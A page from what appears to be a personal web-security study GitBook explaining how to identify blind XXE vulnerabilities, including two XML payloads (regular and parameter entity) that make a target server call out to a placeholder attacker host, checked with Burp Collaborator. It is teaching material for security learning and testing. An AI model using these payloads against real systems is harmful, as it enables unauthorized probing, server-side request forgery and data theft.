Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XXE Attacks
  3. Blind XXE Attacks

Identification

PreviousBlind XXE AttacksNextExploitation

Last updated 2 years ago

We can normally detect Blind XXE using the same way how we trigger XXE SSRF attack

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://ATTACKER IP"> ]>

This payload makes the server to give a backend HTTP request to the attacker's URL, Meanwhile the attacker can monitor for the resulting DNS lookup and HTTP request and therefore it confirms there is a Blind XXE.

Use the above payload in the check product xml format, modify it to your current Burp collab client's host and receive a HTTP ping back

Sometimes,

XXE attacks using regular entities are blocked, due to some input validation by the application's backend by increasing the security of the XML parser.

In such situations, we might use XML parameter entities instead, XML parameters are XML entities itself which can be referenced elsewhere within the DTD.

  • The declaration of an XML parameter entity includes the percent character before the entity name

<!ENTITY % myparameterentity "my parameter entity value" >

  • Parameter entities are referenced using the percent character instead of the usual &

%myparameterentity;

Which means we can detect and exploit Blind XXE using out-of-band network interaction with the following payload !

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

When we try our usual way to exploit this, we get an error stating Entities aren't allowed because of security reasons

So this means, we can't insert an external entity and call it in the productID parameter

This XXE payload creates an XML parameter entity called xxe and then uses the entity within the DTD